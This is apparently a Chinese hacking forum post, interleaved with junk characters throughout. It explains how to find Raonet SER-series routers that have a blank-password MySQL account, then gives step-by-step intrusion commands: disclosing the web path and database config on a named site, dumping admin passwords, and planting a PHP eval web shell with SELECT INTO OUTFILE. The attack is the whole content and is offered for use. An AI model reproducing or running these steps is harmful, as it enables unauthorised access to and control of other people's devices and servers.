寻找存在漏洞的路由器方法:
4 Z8 \" w- e. Y; u; o: a1 D8 Z- m' a/ S4 V' e
1:google搜索'Raonet Subscriber Ethernet Router'/ y6 @: m" `, s) {
: \3 X- ]1 V* @5 J, O2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
2 M+ |- Q7 B4 i/ @
( c8 S/ Y4 H+ C% I3 R E3 U3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
& U. i, f& T8 B# D" W8 W* p8 I5 f5 S6 O/ \' X0 @
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
" ]' E0 Q% X( [# S# J
7 ~& p) m) R/ B7 A( n. ]; x ) T4 T- N1 o3 K. y
; c" f0 I( w9 |* f入侵步骤:" D3 }0 \! ]3 p# W, I3 m% U
9 W. |' N G4 U8 |: w' ]1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php3 k, v( d& a* Z. N" W4 v
- A8 G4 c. u$ M3 @9 ]1 _
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc% [3 x/ Z+ v* a
3:得到密码后连接,查看GUI管理密码:
I9 X0 Q0 X; N- h6 U" ~use ser_500% z0 J! i- t# _: g' [4 j% t/ s# X. h4 s
select id,passwd from user;; y0 T9 c, ?3 m- X6 w
4:通过数据库写入webshell,执行命令:9 m! y' \( {; C2 p. G7 ^ Q- ?
use mysql;' S- f; D c! |0 Q; \
create table ok(cmd TEXT);
8 o2 k: ^4 l3 D4 {4 G# T1 C7 p7 o6 k2 }insert into ok values("<?php @eval($_POST[cmd])?>");, b! c. | ?5 \; W& S
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";4 W1 l/ n; z, o2 |. U6 s7 W! m
drop table ok;* Z4 g! t6 @" z" ]2 ]
8 A. l/ }6 K6 L! M D! g; K5:连接后门shell.php
/ b l+ R7 W, ^1 {6 H3 u
; A) r/ s4 L/ c1 P7 L6. 搞定!
+ ~" U& g7 t& b z: |( U8 e( \' e; `2 o/ z* w; m, K( f
|